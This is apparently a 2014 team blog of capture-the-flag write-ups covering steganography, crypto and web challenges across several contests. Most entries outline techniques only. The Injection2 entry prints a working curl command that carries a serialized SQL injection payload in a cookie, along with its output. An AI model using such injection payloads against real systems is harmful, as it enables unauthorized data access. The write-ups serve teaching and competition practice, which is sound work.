Tuesday, May 13, 2014

ASIS CTF Quals 2014

A great CTF with a lot of interesting steganos has ended. Too bad the event took place on workdays, so our team didn't have much time for it (probably many other teams shared the same problem). We ended up at #10, which wasn't too bad :P Below you can find write-ups for a few challs I solved.


Trivia 50: Image

The file was actually an amazing image of the once popular NES game Battle City, and as a fan of Nintendo I had the emulator ready to play it :P Just complete the first stage and you'll get the flag: 8BIT_RULEZ (although it is a bit different from what is written and caused a lot of confusions for everyone :P)



Web 75: Hidden flag

A web challenge with barely any description, however the title suggests that the flag should be hidden somewhere. It didn't take us much time to notice the HTTP header named x-flag with the value ASIS_b6b?244608c2?c2e869cb56?67b64?b1. Now obviously the task was to find the full hash. My first thought was using a dictionary attack to find a string that generates a hash with the same pattern, but because of work I didn't really have any time to try it :P

At one point, some members in our team noticed that when a wrong solution was submitted, the response was almost instant. This suggested that there should be a javascript check somewhere. From here it didn't take much time for us to find the sha256 hash and recover the full flag: ASIS_b6be244608c27c2e869cb56167b649b1

Stego 100: Spy Paper

The image was quite big and it was quite easy for me to overlook every detail :P Fortunately redoc found anomalies in the blue channels and these dots reminded me of punched tape, which was very close to the final solution. We were able to quickly figure out the parity bits and decrypt the second part, however we could not find anything meaningful from the first part:


After a lot of time spending on it, we came to realize that this could be printer steganography, and the first part could be date and time. With that we were able to fully decrypt the flag: 9/6/19 13:22:44 E4sy_0n3.

Crypto 150: Random Image

This isn't a hard chall, the code seems to randomly create a new image based on the flag but in fact there is quite a big correlation between the "random" result and the original one. Specifically, if the value of the pixel is less than 250, the resulting pixel is the result of some operation on the coordinates xored with a random value which is the same for all pixels. We do not know the random value however we know the result of the operation on the coordinates and by xoring the encrypted image with this value all pixels with values less than 250 should stand out. Here is the final result of the decryption:


Stego 175: White noise

This is an easy prey for my powerful Steganabara, and that was the reason why our team quickly became the first solver. A quick histogram analysis shows that the values in the green and blue channels are evenly distributed, and the reason behind this is that they were made to be used as coordinates to rearrange the pixels.


However, the red channel only has 1 value: 128, so it is pointless if you rearrange the whole image, you'll get just a red square. This got me stumped for a little while, until I realized that the order of arrangement could be important too. With this I only used the first 30 lines of the image for rearrangement, and got the flag:


Wednesday, April 30, 2014

0x3004 CTF

Another great CTF just ended and we were the champion! 0x3004 CTF was a 5-day event to celebrate the Liberation Day 30/04/1975 that ended all the miseries and brought about happiness to everyone. It was a pleasure having solved so many challenges of such great qualities thanks to the administrators.


Below you can find a quick write-up of some challs. Because there are so many of them, I'm only writing out the key points, the rest is up to you :P

Crypto 50: Phú Yên :: No Encryption Here


The cipher text:
TSwnQFMsI2BUPlchTDk2JVM5NV1TPTYpTTo3MT89JkFJPFVdUzoiJVQ3ViVOOSVdRzk3MT8+Nl1V PEVdUic5Nz1BPEYxUz8wYGA=

The = signature at the end makes it fairly easy to identify it as base64 encoded. The decoded text is M,'@S,#`T>W!L96%S95]S=6)M:71?...

This text is still encrypted and because it consists of only printable characters it can be guessed that encryption method is uuencode. It can be decrypted using this online decryption tool but you have to break it into 2 parts to fully decrypt the flag: 0x3004{please_submit_this_sh!t_and_get_your_rewards}

Crypto 50: Quảng Nam :: Chuyển vận lương thực

The encryption is done in the cookie. Trying with different inputs should bring you to a conclusion that the username and the timestamp are combined, xored with a binary key and then base64 encoded.
The string encrypted in the cookie is something like "username=admin;time=2014-04-27T16:27:24.644158", to solve the challenge you have to append ";admin=true" to it and get the flag: 0x3004{you_control_the_world}

Web 50: Yên Bái :: Injection1

Someone else in our team solved it, basically the session is managed by the serialized data in the cookie and you can exploit the deserialization to do SQL injection and get the flag.

Misc 50: Bạc Liêu :: Hidden1

The flag is hidden somewhere in the source code of the challenge page: 0x3004{_haha_you_found_it_:D}

Misc 50: Đà Nẵng :: Áo Dài

This is a BMP stegano. Analysis with my Steganabara's Bit Mask Filter (or Caesum's Stegsolve) will reveal that there is data hidden in the LSB of the pixels:


In fact the authors herd you like BMP so they put a BMP in your BMP so you can extract while you extract :P xp45g did this with a "murderous unreadable 1-liner", and here's the final result:

Misc 50: Vĩnh Long :: HeartBeat

This is similar to the famous HeartBleed bug in OpenSSL. It is even easier because you can input the length directly into the URL. If you input a bigger length than the actual string the rest of the memory will be printed out. We used a length of -1 to dump out everything and after some tries we were able to get the flag: 0x3004{He4rtBle3d_works_this_way}

Misc 50: Lâm Đồng :: Hidden2

The flag is again hidden in the source code of the home page: 0x3004{hidden2_hidden_everywhere}

Web 100: Hải Dương :: CRYPOT

The encryption can be broken using differential attack. In each loop the ciphertext is xored with a hash created from a character in the input and a character in the flag so you can use 2 inputs with the same length as the flag (31) but with different characters at the end, xor the results (which is also the xored result of 2 hashes in the last loop) and from there work out the last character in the flag. Continuing backwards and you can recover the flag: 0x3004{p_to_the_h_to_the_p_yo!}

Web 100: Tuyên Quang :: Injection2

You can still exploit the deserialization to inject SQL code. Below was how xp45g solved it :P

10:54:36: $ phpsessid="$(tr -cd a-zA-Z0-9 < /dev/urandom | head -c 32)" ; curl -s http://challenges.wargame.vn/100-Injection2_00cda8c5d1f13e0e2cb2825c0e9e6618/ -H "Cookie: PHPSESSID=$phpsessid;login=$(./ser.php "wtf',''),(null,(select flag from web100_flag), '$phpsessid') #")" | html2text
10:54:38: Welcome you back. This time, we made it more secure!
10:54:40: Your action has been logged to our DB.
10:54:42: You are logged in as guest.
10:54:44: Your action has been logged to our DB.
10:54:46: Your last logged in time: 0x3004{php_0bj3ct_m4k35_1t_3a5y}.
10:54:48: win \o/

Web 100: Quảng Ninh :: PATH TO PRO

This was quite an annoying chall. At first we found the blind SQL injection with double quotes and substring function and used it to get the admin password YOUWONTBEABLETOGUESSTHISPASS__@#!@(#*!@(#*!@(#*)(!@*# but that wasn't enough to get the flag.

We were having troubles identifying the DBMS because of so many abnormalities and in the end it turned out the challenge was about XPATH injection, something similar to SQL injection in theory but not as popular in practice. The flag was 0x3004{XXXpath}

RE 100: Nghệ An :: PHPVLD

Our team had some troubles with this chall because of misinterpreting the code but it was basically just hash collision. Just generate 2 strings with the same MD5 hashes and the chall is solved.

Crypto 100: Bình Định :: SERICRYPT

The method to solve this chall is similar to the one described in the RSA page: you factorize n, calculate phi(n), then calculate modulus multiplication inverse and decrypt the message. The result is: 6396138900968155672706619512005662088160241943837385041483898733707420105484519573719621312884.

Misc 100: Gia Lai :: Wireshark

This was an easy chall. At first glance we thought the traffic was encrypted using SSL but in the end the flag was transferred in just plain text and you can see it by searching for 0x3004 in a text editor: 0x3004{I_l0v3_wir35h4rk_S0_MUCH!}

Misc 100: Trà Vinh :: f_x

Our analysis was like this: f(12)/f(11) ~= 2.8, f(11)/f(10) ~= 3.1, (12/11)^12 = 2.84094437661548, (11/10)^12 = 3.138428376721 so the function should be a polynomial with the degree of 12. With this the problem becomes solving a system of 13 equations and even though I only had to modify my old program a little I was still a lot slower than xp45g's z3. The flag was 0x3004{M4thz1g}

Crypto 150: Thừa Thiên Huế :: Tàng hình

This is basically a stegano, the flag was hidden insite the KingthingsTrypewriter2 font file. Opening it using a font editor like ttfedit and you'll get the flag: 0x3004{H4Ppy_huNt1Ng} - it was changed later but someone else in our team solved it and I'm too lazy to solve it again :P

Web 150: Lạng Sơn :: XYZ Bank

If you use the default login suggested by the page you'll get a cookie that decrypts to something like ["guest","guest",1234]. Using a python mysql bug you can use ["guest",0,1234] and the session is still valid. Changing the username to admin and brute-forcing the pin you can get the flag: 0x3004{goooo_home_homie}

Crypto 200: An Giang :: Super RSA

Your job is to break an RSA encryption knowing just the public key. However with the source code available you can see that there is a weakness in the encryption: the private key is small (only 1024 bits) while the public key is big (6144 bits). Now the encryption can be broken using Wiener's attack.

Crypto 250: Lai Châu :: CRYPTOWWW

In this chall you need to bypass the hash check to do SQL injection. This can be done using hash length extension attack. At first we were getting no result because of assuming the secret length of 6 but in the end we wrote a program to brute-force the length (which turned out to be more than 20) and got the flag: 0x3004{www_mix_crypto_ftw}

Bonus: Pwn 300: Hà Nội :: Vượt Ngục 2

The nerd term for this type of challenge is "golfing". Below is the result of our python experts' teamwork. Don't ask me for the code explaination :P In fact after the CTF ended they managed to golf it down even more :P


For more information and solutions for other challs, you can visit stypr's write-up page :P

Monday, March 10, 2014

RuCTF Quals 2014

Another great CTF with many challenges in all categories just ended. Our team was #7. Nana. Not too bad, but it was so annoying that without a network specialist we could not solve admin 200 task "Troubleshooting" which 97 other teams solved with ease.


Below are some write-ups. Hopefully they can give new players an introduction to steganalysis.

stegano 100: Cat's eye


This is an easy GIF stegano, but it took me quite a while analysing the image until I noticed it contained 8 similar frames which wasn't easy to notice in GIMP by default (note to myself: next time check the frames first). It is common sense to combine them and find the differences. The positions of the different pixels are as marked below:

It isn't very straightforward, but the flag is hidden here in binary representation. Using black pixels as 0s and green pixels as 1s give you the flag: RUCTF_e4dd9f5cee307b322c3a27abe66e3df9

stegano 300: Nyan-task



This is a very famous image. By finding and comparing it with the original image it can be concluded that there is no information hidden visually. Analysis with Caesum's StegSolve brought me to the conclusion that the only place to hide the flag is inside the palette. It is also suspicious to see only 14 colors used for the image while the palette contains 256 colors with a lot of repetition.


After extracting the palette I found out that this is actually a DataMatrix barcode (thanks stypr). The rest is easy. The hidden text is u.to/P4JUBg, which is a link to the flag: RUCTF_ca8250c2b4b50581afc9ffd1f403f3f2

crypto 200: Mary Queen

The task is to decipher a message written in Chinese characters. The title suggests that this is similar to the cipher used by Mary Queen of Scots, which is a cryptosystem in which simple substitution is used. This cipher is so weak that many tools have been created to solve it automatically, SCBSolvr is one of them. The decrypted text is chapter I of Alice's Adventures in Wonderlands by Lewis Carroll. The name of the book is also the flag.

Sunday, February 9, 2014

Olympic CTF Sochi 2014

The CTF just ended. And by breathtakingly solving a chall at the last minutes we won the silver medals. Banzai!

I was only involved in some parts of the challenges, so no write up this time :P

Update: With this achievement our team qualified for DEFCON 22 CTF. So awesome, but Las Vegas is so far away :(


Monday, January 27, 2014

PHDays CTF Quals 2014

The qualification round just ended today. Our team finished at rank #9. Chinese new year is coming soon so I only managed to catch up with the guys for just a little more than one hour. During that short period of time our team impressed even ourselves by solving 3 challenges and jumped back to top 10. I was involved in 1 of the challs: a ucucuga challenge titled "mp3 me".

The challenge is basically an mp3 stegano. After examining the file we came to a conclusion that there was no where else to hide the flag other than in the id3 part of the file.


Now this is the part where losers are separated from winners. The RGB tags and the presentation of values in triplets make most people try to find a way to get an image, but they are actually just red herrings. The real clue here is the occurrence of NULL. It suggests the end of a message. After trying some conversion, I found out that "78-9c" (hex values of 120-156) was the signature of zlib compressed data, and with that dloser was able to quickly recover the precious flag.

<dloser> >>> zlib.decompress('789ccb8ccf482c498d2f4d06c2f444002a9f05b7'.decode('hex'))
<dloser> 'i_hate_ucucuga'

Solving challenges is fun, and it's even more thrilling when there is a time limit. Oh, it is also good to be able to let everyone know how you solved them, not just limited to the solvers as on normal challenge sites.